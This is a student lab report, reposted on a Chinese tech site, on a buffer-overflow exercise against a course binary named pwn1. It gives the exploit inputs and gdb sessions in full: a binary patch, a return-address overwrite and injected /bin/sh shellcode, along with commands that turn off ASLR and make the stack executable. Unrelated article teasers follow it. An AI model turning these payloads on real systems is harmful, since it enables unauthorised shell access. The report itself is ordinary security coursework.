20232906 2023-2024-2 《网络与系统攻防技术》第九次作业

20232906 2023-2024-2 《网络与系统攻防技术》第九次作业

1.实验内容

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

本次实验一共使用了三种不同方法进行缓冲区溢出攻击:

  • 利用程序中已有的代码片段getShell,手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的缓冲区溢出漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 利用foo函数的缓冲区溢出漏洞注入一个自己制作的shellcode并运行这段shellcode。

2.实验过程

2.1 直接修改程序机器指令,改变程序执行流程

  1. 首先将pwn1.zip下载解压并放入Kali中,使用命令mv pwn1 pwn20232906将文件名进行修改,如图一所示。


    图一 修改文件名
  2. 利用objdump对pwn20232906进行反汇编,并通过管道转发给more作为输入内容便于查看,对应Linux命令如下所示:

    objdump:是在类Unix操作系统上显示关于目标文件的各种信息的命令行程序。例如,它可用作反汇编器来以汇编代码形式查看可执行文件。它是GNU Binutils的一部分,用于在可执行文件和其他二进制数据上进行精细粒度控制。objdump使用BFD库来读取目标文件的内容。

    objdump -d pwn20232906 | more
    

    如图二所示,通过查看反汇编的结果中main函数的相关部分,我们可以发现main函数调用(call)了foo函数(d7 ff ff ff),而因为有getShell函数的存在,我们便可以直接修改该程序,将调用的地址改为getShell函数的基地址即可改变程序的执行流程。


    图二 反汇编查看pwn20232906中的汇编代码
  3. 为了更改地址到getShell函数,首先我们得先弄清楚原来调用的地址d7 ff ff ff的意义。这里的地址使用了补码,且字节序为小端字节序,改写为我们习惯的大端字节序后地址就是ff ff ff d7,换算后的数值为-29h,其含义为foo函数的首地址距离call指令的下一条指令(即80484ba)的偏移量为-29,相加便可得到foo函数的地址为80484ba+ff ff ff d7=8048491

  4. 这下我们就可以确定如何修改这里的内容了,首先算出getShell的首地址相对程序下一条指令地址80484ba的偏移,即804847d-80484ba=ff ff ff c3,再将其改写为小端字节序可得c3 ff ff ff,所以我们需要将原程序中的d7 ff ff ff修改为c3 ff ff ff即可。

  5. 首先我们下载十六进制dump工具xxd,使用命令如下:

    apt install xxd
    
  6. 为了防止修改过程出现错误,故先将pwn20232906程序进行备份,使用命令:

    cp pwn20232906 pwn20232906-1
    

    然后再进行修改,通过vim打开pwn20232906-1

    vi pwn20232906-1
    

    再输入如下命令将显示模式切换成16进制模式

    :%!xxd
    

    “%!”为调用第三方操作对vim内容进行操作,如 :%!tr a-z A-Z 把全文小写字母改成大写。

    使用如下命令找到对应的数据:

    /d7ff
    

    如图三所示,可以找到对应的数据


    图三 找到程序中的对应数据内容
  7. 修改完毕数据后,首先使用如下命令将数据转换为原格式,然后再保存退出(注意顺序)

    :%!xxd -r
    
  8. 运行经过修改后的pwn20232906-1程序,可得结果如图四所示:


    图四 成功获取Shell

2.2 构造输入字符串覆盖返回地址,改变程序执行流

  1. 在2.1中我们采用了直接修改程序文件的方式获取到了Shell,但如今的程序一般都会采用签名等方式来确保程序的完整性,那么我们可不可以不修改程序文件的内容,直接通过输入特殊的字符串来修改程序的返回地址呢?答案是肯定的。如图五所示,我们再观察一下pwn1程序的汇编代码:


    图五 反汇编查看pwn20232906中的汇编代码
  2. 可以发现,在main函数调用的foo函数中仅仅只给输入的数据分配了28字节(0x1c)的空间,而堆栈的结构大致如图六所示:


图六 堆栈简单结构
  1. 也就是说,只要我们输入足够长,并将输入字符串的第33~36字节填入getShell函数的基地址(0804847d),就可以让程序跳转到getShell函数的地方了。

  2. 为了确认输入的数据应该是按照大端字节序输入还是小端字节序,我们通过命令gdb pwn20232906进入调试模式然后输入1111111122222222333333334444444412345678进行验证,如图七所示:


    图七 缓冲区溢出时寄存器数据
  3. 可以看出,eip寄存器中的值即为“4321”的ASCII码,验证了上文中的分析,这也说明我们应当使用小端字节序输入getShell函数的首地址,即7d 84 04 08

  4. 由于我们无法直接输入二进制数据,我们需要借助perl语言先生成一个包含getShell函数首地址的文件,然后通过管道让文件的内容成为pwn1的输入,使用命令如下:

    perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
    # \x0a代表回车,如果没有则需要手动敲一下回车来结束输入
    (cat input; cat) | ./pwn20232906
    # 通过管道让input文件中的内容成为pwn20232906的输入
    
  5. 这时我们发现我们已经成功地获得了Shell,如图八所示:


    图八 成功获取Shell

2.3 注入Shellcode并执行

  1. 前两种方法能够成功的一个前提——程序中本来就含有getShell函数,但我们一般编程的时候是不会主动去为攻击者编写这样的函数。那么对于一个普通的程序来说,使用注入Shellcode的方法才能够让这个程序去执行我们想要的功能。

    Shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。

    在实际的应用中,凡是用来注入的机器指令段都通称为Shellcode,像添加一个用户、运行一条指令。

  2. 首先我们需要下载Execstack,可以通过链接http://ftp.de.debian.org/debian/pool/main/p/prelink/execstack_0.0.20131005-1+b10_amd64.deb进行下载,下载后找到文件位置使用命令dpkg -i execstack_0.0.20131005-1+b10_amd64.deb即可完成安装。

  3. 在正式开始之前,我们需要对操作系统和程序进行一些设置便于找到我们注入的数据的地址,命令如下:

    execstack -s pwn20232906    //设置堆栈可执行
    echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
    
  4. Linux下有两种基本构造攻击buf的方法:

    • retaddr+nop+shellcode
    • nop+shellcode+retaddr

    这样构造是因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。

    简单来说如果缓冲区小就把shellcode放后边,如果缓冲区大就把shellcode放前边

    nop的作用一是为了当作填充数据;二是作为“着陆区/滑行区”,这样可以减小我们猜测返回地址的难度,使我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode

    本次实验我们构造的结构为:anything+retaddr+nops+shellcode,其中shellcode的内容如下:

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
    

    使用如下命令构建字符串并保存到input_shellcode中,其中前四字节还不确定,使用12 34h填充。

    perl -e 'print "A" x 32;print "\x1\x2\x3\x4\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00"' > input_shellcode
    
  5. 接下来我们来确定\x4\x3\x2\x1到底该填什么。打开一个终端注入这段字符串:

    (cat input_shellcode;cat) | ./pwn20232906
    
  6. 再打开另一个终端,首先使用命令找到pwn1的进程号

    ps -ef | grep pwn20232906
    # 这里我返回了如下信息
    # root       67761   66720  0 20:29 pts/0    00:00:00 ./pwn20232906
    # root       67906   67798  0 20:29 pts/1    00:00:00 grep --color=auto pwn20232906
    

    再使用gdb调试该进程

    gdb
    (gdb) attach [pid]
    # 根据上面查找进程号的结果,这里pid应该填67761
    

    然后反汇编foo函数,查看返回指令(ret)的地址

    (gdb) disassemble foo
    # 这里我返回了如下信息
    # Dump of assembler code for function foo:
    # 0x08048491 <+0>:     push   %ebp
    # 0x08048492 <+1>:     mov    %esp,%ebp
    # 0x08048494 <+3>:     sub    $0x38,%esp
    # 0x08048497 <+6>:     lea    -0x1c(%ebp),%eax
    # 0x0804849a <+9>:     mov    %eax,(%esp)
    # 0x0804849d <+12>:    call   0x8048330 <gets@plt>
    # 0x080484a2 <+17>:    lea    -0x1c(%ebp),%eax
    # 0x080484a5 <+20>:    mov    %eax,(%esp)
    # 0x080484a8 <+23>:    call   0x8048340 <puts@plt>
    # 0x080484ad <+28>:    leave
    # 0x080484ae <+29>:    ret
    # End of assembler dump.
    

    在返回指令的地址处设置断点,之后在另外一个终端中按下回车,然后再使用c使程序继续运行

    break *<address>
    # 根据上面的结果,这里的<address>应该改为0x080484ae
    # 在运行程序的终端按下回车
    (gdb) c
    

    待程序运行到断点处,查看此时的esp寄存器的值,获得我们注入的字符串的地址

    (gdb) info r esp
    # 这里我返回了如下信息
    # esp            0xffffd02c          0xffffd02c
    

    我们使用如下指令查看该地址附近的数据

    (gdb) x/16x 0xffffd02c
    # 0xffffd02c:     0x04030201      0x90909090      0xc0319090      0x2f2f6850
    # 0xffffd03c:     0x2f686873      0x896e6962      0x895350e3      0xb0d231e1
    # 0xffffd04c:     0x0080cd0b      0x00333231      0x080484af      0x00000001
    # 0xffffd05c:     0xffffd0f4      0xf7e1dff4      0x080484d0      0xf7ffcba0(gdb) x/16x 0xffffcfec
    # 0xffffcfec:     0x080484ad      0xffffd00c      0x0000000c      0x00000000
    # 0xffffcffc:     0x00000000      0x00000000      0x00000000      0x00000013
    # 0xffffd00c:     0x41414141      0x41414141      0x41414141      0x41414141
    # 0xffffd01c:     0x41414141      0x41414141      0x41414141      0x41414141
    

    从0xffffd02c开始观察,可以发现数据采用小端字节序,并且将返回地址改为ff ff d0 30就可以让程序执行Shellcode,这样一来\x1\x2\x3\x4就应该修改为\x30\xd0\xff\xff,于是我们便重新利用perl语言,将返回地址修改正确,并在最后加上回车(0x0a),然后重新运行程序。

    perl -e 'print "A" x 32;print "\x30\xd0\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00\x0a"' > input_shellcode
    (cat input_shellcode;cat) | ./pwn20232906
    
  7. 这时我们发现我们已经成功地获得了Shell,如图九所示:


    图九 成功获取Shell

3.问题及解决方案

  • 问题1:在2.3时,使用命令execstack操作系统提示——无法定位软件包 execstack

  • 问题1解决方案:通过百度搜索,我找到了execstack的官方网站并成功找到了execstack的安装包,由于kali是Debian的发行版,所以选择了Debian版本的进行下载,具体下载地址见下面的链接。进入链接后在Download处即可找到资源的下载链接。

    https://debian.pkgs.org/10/debian-main-amd64/execstack_0.0.20131005-1+b10_amd64.deb.html

    下载到本地后,使用apt的命令即可完成安装

    apt install ./execstack_0.0.20131005-1+b10_amd64.deb
    
  • 问题2:在2.3中,获取地址后修改字符串的数据然后重新执行发现依旧不成功

  • 问题2解决方案:使用gdb进行调试,发现了每一次esp中的地址都不相同,结合实验指导书的相关内容,发现是没有关闭地址随机化,使用相应命令关闭地址随机化即可。

    echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
    

4.学习感悟、思考等

本次实验进行的是缓冲区溢出攻击,通过动手实践的方式我弄懂了缓冲区溢出的基本原理和常用的方法以及可执行程序的分析方法。在本次实验中,经过王老师的讲解和刘老师的博客,我成功地入门了缓冲区溢出这一个我曾以为困难重重的课题。同时,此次实验也使我对于二进制文件有了初步的了解,拿到了二进制文件,我也不再会不知所措,而是可以通过工具对其进行一定的分析,可以说收获颇多。

本次实验也暴露出了我在某些方面还有所欠缺,例如对于汇编语言的了解还不够深入,很多命令还需要老师的点拨才能够明白它的功能;本次实验中的Shellcode是老师直接提供给我的,是只针对于获得Shell这个功能的。如果要实现其他的功能,编写自己的Shellcode,还需要我对于Shellcode的相关知识认真学习;本次实验对于地址随机化和堆栈保护都进行了关闭,那么在地址随机化和堆栈保护开启的时候如何进行缓冲区溢出攻击也值得我深入思考。只有这样我才能够在此次实验的基础上取得更大的进步。

最后,感谢王老师和刘老师的细心讲解和耐心帮助,也感谢在实验过程中给我帮助的同学们。正因为有你们的帮助我才能够顺利地完成本次实验,谢谢!

参考资料

  • 0x11_MAL 逆向与Bof基础 - wildlinux
  • execstack_0.0.20131005-1+b10_amd64.deb

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/835822.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

暗区突围哪里获得测试资格 暗区突围测试资格获取方法

在游戏业界的浩瀚星空中&#xff0c;《暗区突围》如同一颗璀璨新星&#xff0c;以其独树一帜的游戏模式和前所未有的沉浸式体验&#xff0c;迅速吸引了全球玩家的目光。它不仅仅是一款游戏&#xff0c;更像是一次对勇气、智慧与团队合作的深度探索。玩家在危机四伏的暗区中&…

程序人生 | 人生如棋,落子无悔

人生的开始&#xff0c;始于哭声&#xff0c;浮浮沉沉几十年。终了&#xff0c;一声长叹&#xff0c;在一片哭声中撒手离去。 人生的道路虽然漫长&#xff0c;但是关键就是那么几次机会的选择&#xff0c;可以决定此后几十年的光阴。 有个故事讲&#xff1a;古代有个人去砍柴…

干货教程【AI篇】| 目前全球最强AI换脸工具swapface详细图文教程及整合包下载

需要这个工具整合包的小伙伴可以关注一下文章底部公众号&#xff0c;回复关键词【swapface】即可获取。 从我们的链接下载&#xff0c;得到这个exe文件 双击运行即可进入安装界面 如下图所示已经在安装中啦 安装好之后我们根据上面的安装路径找到要执行的文件 双击红框中的…

三国杀背后的图形化编程 变量跟踪与吐槽的故事

在周末的公司里&#xff0c;卧龙凤雏等几位员工终于结束了加班任务&#xff0c;他们每个人都显现出些许疲惫之态&#xff0c;但心情还算较为轻松愉悦。突然&#xff0c;有人提议玩上几局三国杀&#xff0c;以此来让大家放松一下身心。于是乎&#xff0c;几人纷纷掏出手机&#…

MVC:一种设计模式而非软件架构

在软件开发领域&#xff0c;MVC&#xff08;Model-View-Controller&#xff09;经常被提及&#xff0c;但很多人对其定位存在误解。本文将澄清一个常见的误区&#xff1a;MVC是一种设计模式&#xff0c;而非软件架构。 一、MVC简介 MVC&#xff0c;即模型&#xff08;Model&a…

24寸2K显示器 - HKC G24H2

&#x1f525;&#x1f5a5;️ 嘿&#xff0c;大家好&#xff01;今天&#xff0c;我要给大家介绍一款超棒的显示器——HKCG24H2&#xff01;这款显示器可是个全能选手&#xff0c;无论你是工作狂人还是游戏迷&#xff0c;它都能满足你的需求&#xff01; &#x1f60e;&#x…

ICode国际青少年编程竞赛- Python-2级训练场-基础训练3

ICode国际青少年编程竞赛- Python-2级训练场-基础训练3 1、 d Item.x - Dev.x Dev.step(d)2、 d Spaceship.x - Item.x Spaceship.step(d)3、 d Item.y - Dev.y Dev.step(d)4、 for i in range(4):Spaceship.step(2)d Item[i].x - Dev.xDev.step(d)Dev.step(-d)5、…

VMware 不能拍摄快照

问题&#xff1a; 拍摄快照后&#xff0c;会出现这个弹窗&#xff0c;然后虚拟机就直接自动退出了&#xff0c;还会弹出一个框&#xff1a; 解决方法&#xff1a; 我用的是 window11 和 VMware16.0.0 这是因为VM16与window11&#xff0c;二者之间版本不兼容问题&#xff0c;可…

【CTF Web】XCTF GFSJ0477 backup Writeup(备份文件+源码泄漏+目录扫描)

backup X老师忘记删除备份文件&#xff0c;他派小宁同学去把备份文件找出来,一起来帮小宁同学吧&#xff01; 解法 使用 dirsearch 扫描目录。 dirsearch -u http://61.147.171.105:49361/下载&#xff1a; http://61.147.171.105:64289/index.php.bak打开 index.php.bak&am…

西蓝花病害检测(yolov8模型,从图像、视频和摄像头三种路径识别检测,包含登陆页面、注册页面和检测页面)

1.基于最新的YOLOv8训练的西蓝花病害检测模型&#xff0c;和基于PyQt5制作的可视化西兰花病害检测系统&#xff0c;包含登陆页面、注册页面和检测页面&#xff0c;该系统可自动检测和识别图片或视频当中出现的三类西兰花病害&#xff1a;Downy Mildew, Black Rot, Bacterial Sp…

vuex核心概念-mutations

目录 一、mutations基本认知 二、mutations的基本使用 三、mutations传参语法 四、注意 五、辅助函数&#xff1a;mapMutations 一、mutations基本认知 目标&#xff1a;明确vuex同样遵循单向数据流&#xff0c;组件中不能直接修改仓库的数据。 通过 strict:true可以开启…

Linux —— 信号(4)

Linux —— 信号&#xff08;4&#xff09; 信号的处理用户态和内核态 信号的捕捉sigaction sa_mask字段volatileSIGCHLD信号 我们今天接着来看信号&#xff1a; 信号的处理 信号的处理简单一句话就是在内核态处理的。 用户态和内核态 用户态和内核态是操作系统和计组中的概…

最新版Ceph( Reef版本)文件存储简单对接k8s(下集)

假如ceph集群已经创建 1.创建cephfs_pool存储池 ceph osd pool create fs_kube_data 16 162.创建cephfs_metadata存储池 ceph osd pool create fs_kube_metadata 16 163 创建cephfs ceph fs new cephfs01 fs_kube_metadata fs_kube_data4 设置最大活动数 ceph fs set cephfs01…

fatal: fetch-pack: invalid index-pack output

解决方案&#xff1a;git clone --depth1 要克隆的git地址 下载最近一次提交的代码 其他分支的内容都不下载 这样整体下载体量就变小了 执行命令&#xff1a;git clone --depth 1 https://gitlab.scm321.com/ufx/xxxx.git

Mac idea gradle解决异常: SSL peer shut down incorrectly

系统&#xff1a;mac 软件&#xff1a;idea 解决异常: SSL peer shut down incorrectly 查看有没有安装 gradle -v安装 根据项目gradle提示安装版本 brew install gradle7idea的配置 在settings搜索gradle&#xff0c;配置Local installation&#xff0c;选择自己的安装目录…

机器学习入门到放弃2:朴素贝叶斯

1. 算法介绍 1.1 算法定义 朴素贝叶斯分类&#xff08;NBC&#xff09;是以贝叶斯定理为基础并且假设特征条件之间相互独立的方法&#xff0c;先通过已给定的训练集&#xff0c;以特征词之间独立作为前提假设&#xff0c;学习从输入到输出的联合概率分布&#xff0c;再基于学习…

物联网SCI期刊,潜力新刊,审稿速度快,收稿范围广泛!

一、期刊名称 Internet of Things 二、期刊简介概况 期刊类型&#xff1a;SCI 学科领域&#xff1a;物联网 影响因子&#xff1a;5.9 中科院分区&#xff1a;3区 出版方式&#xff1a;订阅模式/开放出版 版面费&#xff1a;选择开放出版需支付$2310 三、期刊征稿范围 I…

PTP 对时协议 IEEE1588 网络对时 计算原理

前言 本文将阐述 PTP 对时协议的原理&#xff0c;slave 节点如何根据获取的时间来纠正和更新自己的时间。 协议概述 整个通讯过程中会发送 4 种类型的数据包&#xff0c;用来支撑对时。下面是 4 个包的解释 Sync message: 由 master 发送&#xff0c;发起对时事务, slave 接…

Java - Json字符串转List<LinkedHashMap<String,String>>

需求&#xff1a;在处理数据时&#xff0c;需要将一个Object类型对象集合转为有序的Map类型集合。 一、问题 1.原代码&#xff1a; 但在使用时出现报错&#xff1a; Incompatible equality constraint: LinkedHashMap<String, String> and LinkedHashMap 不兼容的相等…

副产物四氯化硅综合利用满足可持续发展需求 行业发展意义重大

副产物四氯化硅综合利用满足可持续发展需求 行业发展意义重大 副产物四氯化硅综合利用&#xff0c;是以工业&#xff08;主要是多晶硅行业&#xff09;副产物四氯化硅为原料&#xff0c;制备高价值化学品的过程&#xff0c;可保护环境不受污染&#xff0c;同时实现废物资源化再…